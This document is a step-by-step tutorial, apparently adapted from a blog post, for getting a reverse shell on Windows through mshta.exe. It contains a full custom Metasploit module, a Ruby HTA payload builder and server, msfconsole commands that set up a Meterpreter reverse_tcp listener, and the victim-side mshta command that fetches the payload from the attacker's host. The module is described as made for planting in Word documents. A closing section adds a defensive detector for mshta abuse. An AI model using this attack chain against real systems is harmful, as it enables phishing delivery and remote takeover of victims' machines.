  • mshta reverse shell

      Kali preparation:

      Copy the following Ruby code into /usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb (the directory under modules/exploits determines the module path you will use later, and Ruby cares about the indentation):

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = NormalRanking

      # HttpServer provides SRVHOST/SRVPORT/URIPATH, get_uri, send_response,
      # regenerate_payload and the on_request_uri/primer callbacks used below.
      include Msf::Exploit::Remote::HttpServer

      def initialize(info = {})
        super(update_info(info,
          'Name'        => 'Microsoft Office Payload Delivery',
          'Description' => %q{
            This module generates a command to place within a Word document
            that, when executed, retrieves an HTA payload via HTTP from a
            web server. Currently have not figured out how to generate a doc.
          },
          'License'     => MSF_LICENSE,
          'Arch'        => ARCH_X86,
          'Platform'    => 'win',
          'Targets'     =>
            [
              ['Automatic', {}],
            ],
          'DefaultTarget' => 0,
        ))
      end

      # Called by HttpServer for each request under URIPATH: wrap the selected
      # payload in an HTA document (the 'hta-psh' format embeds a PowerShell
      # stager) and serve it with the application/hta content type.
      def on_request_uri(cli, _request)
        print_status("Delivering payload")
        p = regenerate_payload(cli)
        data = Msf::Util::EXE.to_executable_fmt(
          framework,
          ARCH_X86,
          'win',
          p.encoded,
          'hta-psh',
          { :arch => ARCH_X86, :platform => 'win' }   # no trailing space in the platform name
        )
        send_response(cli, data, 'Content-Type' => 'application/hta')
      end

      # Called once the HTTP server is listening: print the one-liner to put in
      # the document. The inner quotes must be escaped; unescaped they make this
      # line a Ruby syntax error and the module never loads.
      def primer
        url = get_uri
        print_status("Place the following DDE in an MS document:")
        print_line("mshta.exe \"#{url}\"")
      end
    end
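      The module leaves the two interesting parts to the framework: what the HTA it serves looks like, and how a request for URIPATH is answered. The following is an added example, not code from the original post or from Metasploit, that does both by hand in plain Ruby so the mechanism is visible. The HTA skeleton (VBScript calling WScript.Shell) illustrates the idea behind the 'hta-psh' format and is not msfvenom's exact output; the 192.168.0.105:8080 URL is assumed from the post's LHOST and the HttpServer default port.

```ruby
# Added example, not part of the original post or of Metasploit.
# Builds the HTA an mshta.exe stager fetches and routes a request for the
# configured URI path the way the module's on_request_uri does.

module HtaDelivery
  # What the module's primer should print: mshta.exe takes the URL as its
  # single argument, and the surrounding quotes must survive the Ruby literal.
  def self.primer_line(url)
    %(mshta.exe "#{url}")
  end

  # Minimal HTA document. mshta.exe runs the embedded VBScript with full
  # trust, so CreateObject("WScript.Shell").Run launches the command.
  # Window style 0 keeps the launched process hidden and window.close
  # removes the HTA host right after. Illustrative shape, not msfvenom's
  # exact 'hta-psh' output.
  def self.build_hta(command)
    vb_escaped = command.gsub('"', '""')   # VBScript doubles quotes inside strings
    <<~HTA
      <html>
      <head>
      <script language="VBScript">
      Set sh = CreateObject("WScript.Shell")
      sh.Run "#{vb_escaped}", 0, False
      window.close
      </script>
      </head>
      <body></body>
      </html>
    HTA
  end

  # Route a request path against URIPATH and return [status, headers, body],
  # so the behaviour can be checked without opening a socket. Only the
  # configured path gets the HTA; everything else is a 404, which is how
  # the served document stays off casual crawlers.
  def self.serve(request_path, uripath, command)
    path   = request_path.split('?', 2).first.sub(%r{\A/+}, '')
    wanted = uripath.sub(%r{\A/+}, '')
    if path == wanted
      body = build_hta(command)
      [200, { 'Content-Type' => 'application/hta',
              'Content-Length' => body.bytesize.to_s }, body]
    else
      [404, { 'Content-Type' => 'text/plain' }, "Not found\n"]
    end
  end
end

if $PROGRAM_NAME == __FILE__
  url = 'http://192.168.0.105:8080/aaaa'   # assumed: post's LHOST plus default SRVPORT
  puts HtaDelivery.primer_line(url)
  status, headers, body = HtaDelivery.serve('/aaaa', 'aaaa', 'calc.exe')
  puts "#{status} #{headers['Content-Type']}"
  puts body
end
```

      Running it prints the corrected primer line and a 200 application/hta response whose VBScript runs the placeholder command; the real module substitutes the hta-psh output, where the command is a PowerShell one-liner carrying the Meterpreter stager.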
    

      Start the PostgreSQL database that Metasploit uses:

    service postgresql start

      Then start msfconsole:

    sudo msfconsole

      Reload all modules so the new file is picked up (a module that fails to parse, for example because of an unescaped quote in primer, is reported here and will not appear in search):

    reload_all

      Find the msh_shell module we just created:

    search msh_shell

      Load it (the module path mirrors where the file was placed under modules/exploits):

    use exploit/windows/smb/msh_shell

      Select a reverse-connect payload, set the local listener address and the URI path, then run it:

    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.105
    set uripath aaaa
    exploit

      exploit starts the payload handler on LHOST:LPORT and the HTTP server on SRVPORT (8080 by default); primer then prints the exact mshta.exe line, port included. LHOST must be the Kali address the Windows host can reach.

      Windows system:

      Open the Run dialog and execute the URL the module printed (with the default SRVPORT that means port 8080):

    mshta http://<Kali IP>:8080/aaaa

      Kali then receives a shell (a Meterpreter session) from the Windows machine.
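      The same last step seen from the defender's side. This is an added example, not from the original post: it runs a few rules over Sysmon Event ID 1 style process-creation records (Image, CommandLine, ParentImage) and flags mshta.exe when it is handed a remote URL, an inline vbscript:/javascript: protocol, or is spawned by an Office application, which is how the module above is meant to be triggered from a Word document. The log lines are constructed for this example; the field layout is a flattened "Key: value | Key: value" form, not Sysmon's XML.

```ruby
# Added example, not part of the original post: detection rules for
# mshta.exe abuse over constructed Sysmon-style process-creation lines.

module MshtaDetector
  OFFICE_PARENTS = %w[winword.exe excel.exe powerpnt.exe outlook.exe].freeze
  # Quotes excluded so a quoted URL argument yields the bare URL.
  REMOTE_URL   = %r{\b(?:https?|ftp)://[^\s"']+}i
  SCRIPT_PROTO = /\b(?:vbscript|javascript|about):/i

  # Last path component, tolerant of Windows backslashes on any host OS
  # (File.basename would not split on '\' when run on Linux).
  def self.basename(path)
    path.to_s.split(/[\\\/]/).last.to_s.downcase
  end

  # "Key: value | Key: value" -> {key => value}; only the first colon splits,
  # so drive letters and http: inside values survive.
  def self.parse(line)
    line.split('|')
        .map { |kv| kv.split(':', 2).map(&:strip) }
        .select { |kv| kv.size == 2 }
        .to_h
  end

  # Findings for one record; empty for anything that is not mshta.exe or
  # that only opens a local .hta (legitimate installers do that, so a local
  # path alone is not flagged here; pair it with file-origin checks instead).
  def self.findings(line)
    rec = parse(line)
    return [] unless basename(rec['Image']) == 'mshta.exe'
    cmd    = rec['CommandLine'].to_s
    parent = basename(rec['ParentImage'])
    out = []
    out << "remote HTA fetch: #{cmd[REMOTE_URL]}" if cmd =~ REMOTE_URL
    out << 'inline script protocol'                if cmd =~ SCRIPT_PROTO
    out << "spawned by Office process #{parent}"   if OFFICE_PARENTS.include?(parent)
    out
  end

  # Map of flagged line => findings.
  def self.scan(lines)
    lines.each_with_object({}) do |l, h|
      f = findings(l)
      h[l] = f unless f.empty?
    end
  end
end

# Constructed sample records (not real telemetry).
SAMPLE_LOG = [
  'Image: C:\Windows\System32\mshta.exe | CommandLine: mshta http://192.168.0.105:8080/aaaa | ParentImage: C:\Windows\explorer.exe',
  'Image: C:\Windows\System32\mshta.exe | CommandLine: "C:\Windows\System32\mshta.exe" "http://192.168.0.105:8080/aaaa" | ParentImage: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE',
  'Image: C:\Windows\System32\mshta.exe | CommandLine: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""calc""") | ParentImage: C:\Windows\System32\cmd.exe',
  'Image: C:\Windows\System32\mshta.exe | CommandLine: mshta C:\Program Files\Vendor\setup.hta | ParentImage: C:\Program Files\Vendor\installer.exe',
  'Image: C:\Windows\System32\notepad.exe | CommandLine: notepad http://example.org | ParentImage: C:\Windows\explorer.exe',
].freeze

if $PROGRAM_NAME == __FILE__
  MshtaDetector.scan(SAMPLE_LOG).each do |line, findings|
    puts "ALERT #{findings.join('; ')}"
    puts "  #{line}"
  end
end
```

      Three of the five records are flagged: the plain Run-dialog fetch from the post, the Word-spawned fetch (two findings, URL plus parent), and the inline vbscript: one-liner. The local .hta launched by an installer and the notepad line are left alone; mshta run from Office or with any network argument is rare enough on workstations that this rule set can be deployed as a high-severity alert, while local .hta use needs allow-listing per environment.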

  • Original URL: https://www.cnblogs.com/diligenceday/p/7906878.html